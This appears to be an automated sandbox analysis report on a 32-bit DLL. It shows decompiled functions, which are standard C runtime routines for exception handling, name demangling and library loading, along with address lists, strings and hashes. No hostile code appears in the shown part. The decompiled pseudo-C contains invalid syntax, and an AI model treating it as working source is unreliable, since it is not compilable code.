				void* _t100;
				intOrPtr* _t102;
				intOrPtr _t105;
				intOrPtr* _t107;
				signed int _t112;
				void* _t113;

				_t79 = __ebx;
				_t110 = _t112;
				_push(0xffffffff);
				_push(E6E202BA5);
				_push( *[fs:0x0]);
				_t113 = _t112 - 0x5c;
				_t49 =  *0x6e212008; // 0xa172442e
				_t50 = _t49 ^ _t112;
				_v24 = _t50;
				_push(__edi);
				_push(_t50);
				 *[fs:0x0] =  &_v16;
				_t102 = __ecx;
				_v100 = __ecx;
				_t4 =  &_a4; // 0x6e202c0d
				_t105 =  *_t4;
				_v100 = __ecx;
				_t52 =  *0x6e20ba80; // 0x6f72
				asm("movq xmm0, [0x6e20ba78]");
				_v40 = _t52;
				_t53 =  *0x6e20ba82; // 0x72
				_v28 = 0xf;
				_v32 = 0xb;
				asm("movq [ebp-0x2c], xmm0");
				_v38 = _t53;
				_v37 = 0;
				_v8 = 0;
				_t54 = E6E1925A0(__ebx,  &_v72,  &_v48, __ecx, 0x1f4);
				_v8 = 1;
				E6E195230(_t54, _t105);
				_t95 = _v52;
				if(_t95 < 0x10) {
					L4:
					_t96 = _v28;
					_v56 = 0;
					_v52 = 0xf;
					_v72 = 0;
					if(_t96 < 0x10) {
						L8:
						asm("xorps xmm0, xmm0");
						_v100 = 1;
						asm("movq [edi+0x4], xmm0");
						_t84 =  >=  ? _v96 :  &_v96;
						 *_t102 = 0x6e20eb38;
						 *((intOrPtr*)(_t102 + 0xc)) = 0x1f4;
						 *((intOrPtr*)(_t102 + 0x10)) = 0x6e204274;
						asm("movq [eax], xmm0");
						_v104 =  >=  ? _v96 :  &_v96;
						E6E19B603( &_v104, _t102 + 0x14);
						_t97 = _v76;
						_t113 = _t113 + 8;
						 *((intOrPtr*)(_t102 + 0x10)) = 0x6e2042ec;
						 *_t102 = 0x6e20eba4;
						if(_t97 < 0x10) {
							L12:
							 *[fs:0x0] = _v16;
							return E6E199EE7(_v24 ^ _t110);
						} else {
							_t89 = _v96;
							_t98 = _t97 + 1;
							_t61 = _t89;
							if(_t98 < 0x1000) {
								L11:
								_push(_t98);
								E6E19A3FB(_t89);
								goto L12;
							} else {
								_t89 =  *((intOrPtr*)(_t89 - 4));
								_t98 = _t98 + 0x23;
								if(_t61 - _t89 + 0xfffffffc > 0x1f) {
									goto L14;
								} else {
									goto L11;
								}
							}
						}
					} else {
						_t91 = _v48;
						_t99 = _t96 + 1;
						_t70 = _t91;
						if(_t99 < 0x1000) {
							L7:
							_push(_t99);
							E6E19A3FB(_t91);
							_t113 = _t113 + 8;
							goto L8;
						} else {
							_t89 =  *((intOrPtr*)(_t91 - 4));
							_t98 = _t99 + 0x23;
							if(_t70 - _t89 + 0xfffffffc > 0x1f) {
								goto L13;
							} else {
								goto L7;
							}
						}
					}
				} else {
					_t92 = _v72;
					_t100 = _t95 + 1;
					_t75 = _t92;
					if(_t100 < 0x1000) {
						L3:
						_push(_t100);
						E6E19A3FB(_t92);
						_t113 = _t113 + 8;
						goto L4;
					} else {
						_t89 =  *((intOrPtr*)(_t92 - 4));
						_t98 = _t100 + 0x23;
						if(_t75 - _t89 + 0xfffffffc > 0x1f) {
							L13:
							E6E1AD960(_t79, _t89, _t98, _t102, __eflags);
							L14:
							E6E1AD960(_t79, _t89, _t98, _t102, __eflags);
							asm("int3");
							asm("int3");
							asm("xorps xmm0, xmm0");
							_push(_t105);
							_t107 = _t89;
							_v128 = _v112;
							_v124 = 1;
							asm("movq [esi+0x4], xmm0");
							 *_t107 = 0x6e20eb38;
							 *((intOrPtr*)(_t107 + 0xc)) = 0x1f4;
							 *((intOrPtr*)(_t107 + 0x10)) = 0x6e204274;
							asm("movq [ecx], xmm0");
							E6E19B603( &_v128, _t107 + 0x14);
							 *((intOrPtr*)(_t107 + 0x10)) = 0x6e2042ec;
							 *_t107 = 0x6e20eba4;
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

0x6e192c10
0x6e192c11
0x6e192c13
0x6e192c15
0x6e192c20
0x6e192c21
0x6e192c24
0x6e192c29
0x6e192c2b
0x6e192c2f
0x6e192c30
0x6e192c34
0x6e192c3a
0x6e192c3c
0x6e192c3f
0x6e192c3f
0x6e192c42
0x6e192c45
0x6e192c4b
0x6e192c53
0x6e192c57
0x6e192c5c
0x6e192c63
0x6e192c6a
0x6e192c6f
0x6e192c72
0x6e192c7e
0x6e192c88
0x6e192c90
0x6e192c97
0x6e192c9c
0x6e192ca2
0x6e192cd0
0x6e192cd0
0x6e192cd3
0x6e192cda
0x6e192ce1
0x6e192ce8
0x6e192d16
0x6e192d1d
0x6e192d20
0x6e192d24
0x6e192d2c
0x6e192d30
0x6e192d36
0x6e192d3d
0x6e192d45
0x6e192d4d
0x6e192d50
0x6e192d55
0x6e192d58
0x6e192d5b
0x6e192d62
0x6e192d6b
0x6e192d95
0x6e192d9a
0x6e192db1
0x6e192d6d
0x6e192d6d
0x6e192d70
0x6e192d71
0x6e192d79
0x6e192d8b
0x6e192d8b
0x6e192d8d
0x00000000
0x6e192d7b
0x6e192d7b
0x6e192d7e
0x6e192d89
0x00000000
0x00000000
0x00000000
0x00000000
0x6e192d89
0x6e192d79
0x6e192cea
0x6e192cea
0x6e192ced
0x6e192cee
0x6e192cf6
0x6e192d0c
0x6e192d0c
0x6e192d0e
0x6e192d13
0x00000000
0x6e192cf8
0x6e192cf8
0x6e192cfb
0x6e192d06
0x00000000
0x00000000
0x00000000
0x00000000
0x6e192d06
0x6e192cf6
0x6e192ca4
0x6e192ca4
0x6e192ca7
0x6e192ca8
0x6e192cb0
0x6e192cc6
0x6e192cc6
0x6e192cc8
0x6e192ccd
0x00000000
0x6e192cb2
0x6e192cb2
0x6e192cb5
0x6e192cc0
0x6e192db4
0x6e192db4
0x6e192db9
0x6e192db9
0x6e192dbe
0x6e192dbf
0x6e192dc7
0x6e192dca
0x6e192dcb
0x6e192dcd
0x6e192dd4
0x6e192dde
0x6e192de3
0x6e192de9
0x6e192df0
0x6e192df8
0x6e192dfc
0x6e192e04
0x6e192e0b
0x6e192e17
0x00000000
0x00000000
0x00000000
0x6e192cc0
0x6e192cb0

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6E192D50
___std_exception_copy.LIBVCRUNTIME ref: 6E192DFC

Strings

B n, xrefs: 6E192E04
, n, xrefs: 6E192C3F, 6E192C8D, 6E192DCA
other_error, xrefs: 6E192C4B

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: ___std_exception_copy
String ID: , n$other_error$B n
API String ID: 2659868963-2530797092
Opcode ID: aec761e64ebe3c7ac7dba1d5d44b9091fa00c31633c84153ffe508c782d0e108
Instruction ID: e8011e39a7aa3f233d37ca5e17a4bb17d6a218cdc970a22e079621510d6d3419
Opcode Fuzzy Hash: aec761e64ebe3c7ac7dba1d5d44b9091fa00c31633c84153ffe508c782d0e108
Instruction Fuzzy Hash: C651CF71A102499FDB14CFE8C844BDDFBB6FF95304F10861DE455A7680E770AA84DB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B8237, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B8237(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t36;
				intOrPtr* _t38;
				intOrPtr _t39;

				_t38 = _a4;
				if(_t38 != 0) {
					__eflags =  *_t38;
					if( *_t38 != 0) {
						_t14 = E6E1B925C(_a16, 0, _t38, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t14;
						if(__eflags != 0) {
							_t36 = _a8;
							__eflags = _t14 -  *((intOrPtr*)(_t36 + 0xc));
							if(_t14 <=  *((intOrPtr*)(_t36 + 0xc))) {
								L10:
								_t15 = E6E1B925C(_a16, 0, _t38, 0xffffffff,  *((intOrPtr*)(_t36 + 8)),  *((intOrPtr*)(_t36 + 0xc)), 0, 0);
								__eflags = _t15;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t36 + 0x10)) = _t15 - 1;
									_t17 = 0;
									__eflags = 0;
								} else {
									E6E1B0FD5(GetLastError());
									_t17 =  *((intOrPtr*)(E6E1B100B(__eflags)));
								}
								L13:
								L14:
								return _t17;
							}
							_t17 = E6E1B834A(_t36, _t14);
							__eflags = _t17;
							if(_t17 != 0) {
								goto L13;
							}
							goto L10;
						}
						E6E1B0FD5(GetLastError());
						_t17 =  *((intOrPtr*)(E6E1B100B(__eflags)));
						goto L14;
					}
					_t39 = _a8;
					__eflags =  *((intOrPtr*)(_t39 + 0xc));
					if( *((intOrPtr*)(_t39 + 0xc)) != 0) {
						L5:
						 *((char*)( *((intOrPtr*)(_t39 + 8)))) = 0;
						_t17 = 0;
						 *((intOrPtr*)(_t39 + 0x10)) = 0;
						goto L14;
					}
					_t17 = E6E1B834A(_t39, 1);
					__eflags = _t17;
					if(_t17 != 0) {
						goto L14;
					}
					goto L5;
				}
				E6E1B837E(_a8);
				return 0;
			}

0x6e1b823d
0x6e1b8242
0x6e1b8256
0x6e1b8259
0x6e1b828b
0x6e1b8293
0x6e1b8295
0x6e1b82ae
0x6e1b82b1
0x6e1b82b4
0x6e1b82c2
0x6e1b82d1
0x6e1b82d9
0x6e1b82db
0x6e1b82f4
0x6e1b82f7
0x6e1b82f7
0x6e1b82dd
0x6e1b82e4
0x6e1b82ef
0x6e1b82ef
0x6e1b82f9
0x6e1b82fa
0x00000000
0x6e1b82fa
0x6e1b82b9
0x6e1b82be
0x6e1b82c0
0x00000000
0x00000000
0x00000000
0x6e1b82c0
0x6e1b829e
0x6e1b82a9
0x00000000
0x6e1b82a9
0x6e1b825b
0x6e1b825e
0x6e1b8261
0x6e1b8274
0x6e1b8277
0x6e1b8279
0x6e1b827b
0x00000000
0x6e1b827b
0x6e1b8267
0x6e1b826c
0x6e1b826e
0x00000000
0x00000000
0x00000000
0x6e1b826e
0x6e1b8247
0x00000000

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6E1B823C

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: c416f00ab60892d48af79759cd693a606e3183a53f2f93ead7d23b5beff6d23a
Instruction ID: 9aad20bd44ce61691528867ebc21a166356b4502eaefedac221b2e16a391aae2
Opcode Fuzzy Hash: c416f00ab60892d48af79759cd693a606e3183a53f2f93ead7d23b5beff6d23a
Instruction Fuzzy Hash: 3821D471614907AFDB00EFE58C8089B77ADEF657687114A58F42597150EB30DCC1E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A0324, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A0324(intOrPtr* _a4) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char* _v20;
				char _v28;
				intOrPtr* _t33;
				intOrPtr _t34;
				signed int _t38;
				intOrPtr* _t39;

				_t33 =  *0x6e21304c; // 0x0
				_v12 = 0;
				_v8 = 0;
				_t34 =  *_t33;
				if(_t34 == 0) {
					E6E19D50F(_a4, 1);
					return _a4;
				} else {
					_t38 = _t34 + 0xffffffd0;
					if(_t38 > 7) {
						_t39 = _a4;
						 *((intOrPtr*)(_t39 + 4)) = 0;
						 *((char*)(_t39 + 4)) = 2;
						 *_t39 = 0;
						return _t39;
					} else {
						switch( *((intOrPtr*)(_t38 * 4 +  &M6E1A0424))) {
							case 0:
								_v20 = "char ";
								goto L7;
							case 1:
								_v20 = "short ";
								_v16 = 6;
								goto L8;
							case 2:
								L9:
								 *0x6e21304c =  *0x6e21304c + 1;
								_t44 =  *((char*)( *0x6e21304c)) - 0x31;
								if(_t44 == 0) {
									L13:
									_v20 = "unsigned ";
									_v16 = 9;
									_t46 = E6E19D46F( &_v28,  &_v20);
									_t19 =  &_v20; // 0x6e20545c
									E6E19D8A2(_t46, _t19,  &_v12);
									_t20 =  &_v20; // 0x6e20545c
									_v12 =  *_t20;
									_v8 = _v16;
								} else {
									_t52 = _t44;
									if(_t52 == 0) {
										goto L13;
									} else {
										_t54 = _t52;
										if(_t54 == 0 || _t54 == 0) {
											goto L13;
										}
									}
								}
								_t50 = _a4;
								 *_t50 = _v12;
								 *((intOrPtr*)(_t50 + 4)) = _v8;
								return _t50;
								goto L17;
							case 3:
								_v20 = "int ";
								_v16 = 4;
								goto L8;
							case 4:
								_v20 = "long ";
								L7:
								_v16 = 5;
								L8:
								E6E19D731( &_v12,  &_v20);
								goto L9;
						}
					}
				}
				L17:
			}

0x6e1a032a
0x6e1a0331
0x6e1a0334
0x6e1a0337
0x6e1a033b
0x6e1a0417
0x6e1a0420
0x6e1a0341
0x6e1a0344
0x6e1a034a
0x6e1a0404
0x6e1a0407
0x6e1a040a
0x6e1a040e
0x6e1a0411
0x6e1a0350
0x6e1a0350
0x00000000
0x6e1a0357
0x00000000
0x00000000
0x6e1a0360
0x6e1a0367
0x00000000
0x00000000
0x6e1a039a
0x6e1a03a2
0x6e1a03a8
0x6e1a03ab
0x6e1a03bf
0x6e1a03c2
0x6e1a03cd
0x6e1a03d4
0x6e1a03dd
0x6e1a03e3
0x6e1a03e8
0x6e1a03eb
0x6e1a03f1
0x6e1a03ad
0x6e1a03ae
0x6e1a03b1
0x00000000
0x6e1a03b3
0x6e1a03b4
0x6e1a03b7
0x00000000
0x00000000
0x6e1a03b7
0x6e1a03b1
0x6e1a03f4
0x6e1a03fa
0x6e1a03ff
0x6e1a0403
0x00000000
0x00000000
0x6e1a0370
0x6e1a0377
0x00000000
0x00000000
0x6e1a0380
0x6e1a0387
0x6e1a0387
0x6e1a038e
0x6e1a0395
0x00000000
0x00000000
0x6e1a0350
0x6e1a034a
0x00000000

APIs

shared_ptr.LIBCMT ref: 6E1A0395
DName::operator+.LIBCMT ref: 6E1A03E3
DName::DName.LIBVCRUNTIME ref: 6E1A0417

Strings

\T n, xrefs: 6E1A03BF, 6E1A038E, 6E1A0391, 6E1A03C9
\T n, xrefs: 6E1A03DD, 6E1A03E0

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: NameName::Name::operator+shared_ptr
String ID: \T n$\T n
API String ID: 3919194733-3834308790
Opcode ID: ff00c6e98eb65cefa318d23256421b626c9e82d1d992a979c1282b9557418d4e
Instruction ID: 3dd822f2fec8b240d699b24a609265ad52e08c708077ddee7694e6f2ba5156a8
Opcode Fuzzy Hash: ff00c6e98eb65cefa318d23256421b626c9e82d1d992a979c1282b9557418d4e
Instruction Fuzzy Hash: 383128B4900209EFCF04CFE8C595AEDBBB5BF05318F008599E625AB381EB749A84DF51

Uniqueness

Uniqueness Score: -1.00%

Function 6E19B7E7, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E6E19B7E7(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4) {
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				void* __esi;
				void* __ebp;
				void* _t19;
				void* _t21;
				signed int _t26;
				signed int _t35;
				void* _t38;
				intOrPtr* _t40;
				intOrPtr* _t42;
				intOrPtr _t43;
				signed int* _t44;

				_t34 = __ecx;
				_t33 = __ebx;
				_t42 = _a4;
				_push(__edi);
				_t40 =  *_t42;
				if( *_t40 == 0xe0434352 ||  *_t40 == 0xe0434f4d) {
					_t19 = E6E19BF1F(_t33, _t34, _t38, _t40, _t42);
					__eflags =  *(_t19 + 0x18);
					if( *(_t19 + 0x18) > 0) {
						_t21 = E6E19BF1F(_t33, _t34, _t38, _t40, _t42);
						_t3 = _t21 + 0x18;
						 *_t3 =  *(_t21 + 0x18) - 1;
						__eflags =  *_t3;
					}
				} else {
					if( *_t40 == 0xe06d7363) {
						 *((intOrPtr*)(E6E19BF1F(__ebx, __ecx, _t38, _t40, _t42) + 0x10)) = _t40;
						_t43 =  *((intOrPtr*)(_t42 + 4));
						 *((intOrPtr*)(E6E19BF1F(__ebx, __ecx, _t38, _t40, _t43) + 0x14)) = _t43;
						E6E1ADB97(__ebx, __ecx, _t38, _t40, __eflags);
						asm("int3");
						_push(__ecx);
						_push(__ecx);
						_t44 = _v8;
						 *_t44 =  *_t44 & 0x00000000;
						_t26 =  *(E6E19BF1F(_t33, __ecx, _t38, _t40, _t44, _t43) + 0x10);
						__eflags = _t26;
						if(_t26 == 0) {
							L12:
							__eflags = 0;
							return 0;
						}
						_t35 =  *(_t26 + 0x1c);
						__eflags = _t35;
						if(_t35 == 0) {
							goto L12;
						}
						__eflags =  *_t35 & 0x00000010;
						if(( *_t35 & 0x00000010) == 0) {
							_t15 =  &_v12;
							 *_t15 = _v12 & 0x00000000;
							__eflags =  *_t15;
							_v16 = _t26;
							_push( &_v16);
							 *_t44 = E6E19B8A9("LH n");
							goto L12;
						}
						return  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t26 + 0x18)))) - 4));
					} else {
					}
				}
				return 0;
			}

0x6e19b7e7
0x6e19b7e7
0x6e19b7eb
0x6e19b7ee
0x6e19b7ef
0x6e19b7f7
0x6e19b80b
0x6e19b810
0x6e19b814
0x6e19b816
0x6e19b81b
0x6e19b81b
0x6e19b81b
0x6e19b81b
0x6e19b801
0x6e19b807
0x6e19b829
0x6e19b82c
0x6e19b834
0x6e19b837
0x6e19b83c
0x6e19b840
0x6e19b841
0x6e19b843
0x6e19b846
0x6e19b84e
0x6e19b851
0x6e19b853
0x6e19b884
0x6e19b884
0x00000000
0x6e19b884
0x6e19b855
0x6e19b858
0x6e19b85a
0x00000000
0x00000000
0x6e19b85c
0x6e19b85f
0x6e19b86b
0x6e19b86b
0x6e19b86b
0x6e19b86f
0x6e19b875
0x6e19b882
0x00000000
0x6e19b882
0x00000000
0x00000000
0x6e19b809
0x6e19b807
0x6e19b823

APIs

__is_exception_typeof.LIBVCRUNTIME ref: 6E19B87B

Strings

MOC, xrefs: 6E19B7F9
LH n, xrefs: 6E19B876
RCC, xrefs: 6E19B7F1
csm, xrefs: 6E19B801

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: __is_exception_typeof
String ID: LH n$MOC$RCC$csm
API String ID: 3140442014-4024210137
Opcode ID: 78247b125c82abe35007a9500fec45dbea6faf8ab75a72411cad8dfb31737573
Instruction ID: a99836f9035f0d77a2aa91fffffda2f3699dcec61c11bc1ffc66f5e11ddab837
Opcode Fuzzy Hash: 78247b125c82abe35007a9500fec45dbea6faf8ab75a72411cad8dfb31737573
Instruction Fuzzy Hash: 79115B325042059FDB08DFE5D400ED9B7ECFF19215F2148AAE9119B225D778EAC0FB9A

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A386E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1A386E(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x6e21307c + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x6e2057e0 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E6E1B0F58(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x6e1a3875
0x6e1a38e9
0x6e1a387a
0x6e1a387c
0x6e1a3883
0x6e1a3887
0x6e1a3890
0x6e1a389f
0x6e1a38a8
0x6e1a38ac
0x6e1a38f5
0x6e1a38f7
0x6e1a38fb
0x6e1a38fe
0x6e1a38fe
0x6e1a3904
0x6e1a3904
0x6e1a38f0
0x6e1a38f4
0x6e1a38f4
0x6e1a38ae
0x6e1a38b7
0x6e1a38e1
0x6e1a38e4
0x6e1a38e6
0x6e1a38e6
0x00000000
0x6e1a38e6
0x6e1a38b9
0x6e1a38c4
0x6e1a38c9
0x6e1a38ce
0x00000000
0x00000000
0x6e1a38d5
0x6e1a38db
0x6e1a38df
0x00000000
0x00000000
0x00000000
0x6e1a38df
0x6e1a388c
0x00000000
0x00000000
0x00000000
0x6e1a388e
0x6e1a38ee
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,6E1A392F,00000000,?,00000001,00000000,?,6E1A3A62,00000001,FlsFree,6E20589C,FlsFree,00000000), ref: 6E1A38FE

Strings

api-ms-, xrefs: 6E1A38BE

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: e942ad82e71c13728a7533c8842b3310524acb1cb0c349187cecec74223010a9
Instruction ID: 2f6b4cb8d9e1d9d4d256d5debd01f60b0f5c3e1da8a4e955125d8b449330a870
Opcode Fuzzy Hash: e942ad82e71c13728a7533c8842b3310524acb1cb0c349187cecec74223010a9
Instruction Fuzzy Hash: 9411A775A44625EBDF528AEC884D75D77A5AF13770F250214EB10E72C0D670EDC2E6E0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B17B6, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1B17B6(WCHAR* _a4) {
				struct HINSTANCE__* _t5;

				_t5 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t5 != 0) {
					return _t5;
				} else {
					if(GetLastError() != 0x57 || E6E1B0F58(_a4, L"api-ms-", 7) == 0 || E6E1B0F58(_a4, L"ext-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x6e1b17c5
0x6e1b17cd
0x6e1b1818
0x6e1b17cf
0x6e1b17d8
0x00000000
0x6e1b1815
0x6e1b1814
0x6e1b1814

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000800,?,6E1B176F), ref: 6E1B17C5
GetLastError.KERNEL32(?,6E1B176F), ref: 6E1B17CF
LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 6E1B180D

Strings

ext-ms-, xrefs: 6E1B17F2
api-ms-, xrefs: 6E1B17DC

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-$ext-ms-
API String ID: 3177248105-537541572
Opcode ID: ff828ae8cab5760932065ee65864ac5863a75da8bf597479d04337bbd4ab21d6
Instruction ID: 8d2b4ba5403e7e94dbed347259b79866dc5b6ee5e3986f6d9eda98f2ed4a9516
Opcode Fuzzy Hash: ff828ae8cab5760932065ee65864ac5863a75da8bf597479d04337bbd4ab21d6
Instruction Fuzzy Hash: E1F0A731784208F7EF500AA1DC09B593E5AAB62B44F258034FD0CA80D1F772D4E5E554

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AE004, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E6E1AE004(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x6e204228(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x6e1ae00a
0x6e1ae00e
0x6e1ae019
0x6e1ae021
0x6e1ae02c
0x6e1ae032
0x6e1ae036
0x6e1ae03d
0x6e1ae043
0x6e1ae043
0x6e1ae045
0x6e1ae04a
0x00000000
0x6e1ae04f
0x6e1ae056

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6E1ADFD7,?,?,6E1ADF9F,?,00000001,?), ref: 6E1AE019
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E1AE02C
FreeLibrary.KERNEL32(00000000,?,?,6E1ADFD7,?,?,6E1ADF9F,?,00000001,?), ref: 6E1AE04F

Strings

mscoree.dll, xrefs: 6E1AE012
CorExitProcess, xrefs: 6E1AE024

Memory Dump Source

Source File: 00000001.00000002.645916064.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000001.00000002.645911367.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.645983742.000000006E204000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b4091cc14b9b57a38d62a92ad35ce4152256c8a404be9e27e322eb98f70fbc6f
Instruction ID: 23155576a51acf90d7ecbbfa7456376e510f5c4f8a2e9176b7a8eca32271aeae
Opcode Fuzzy Hash: b4091cc14b9b57a38d62a92ad35ce4152256c8a404be9e27e322eb98f70fbc6f
Instruction Fuzzy Hash: 63F08231A00619FBDF219BD0CA0DB9EBA7AEB61352F144054E901A1290DB34CB41EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C0C42, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1C0C42(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6e212750; // 0x6e2127a4
					if(_t23 != 0) {
						E6E1B110D(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6e212754; // 0x6e2138c8
					if(_t24 != 0) {
						E6E1B110D(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6e212758; // 0x6e2138c8
					if(_t25 != 0) {
						E6E1B110D(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6e212780; // 0x6e2127a8
					if(_t26 != 0) {
						E6E1B110D(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6e212784; // 0x6e2138cc
					if(_t27 != 0) {
						return E6E1B110D(_t6);
					}
				}
				return _t6;
			}

0x6e1c0c48
0x6e1c0c4d
0x6e1c0c51
0x6e1c0c57
0x6e1c0c5a
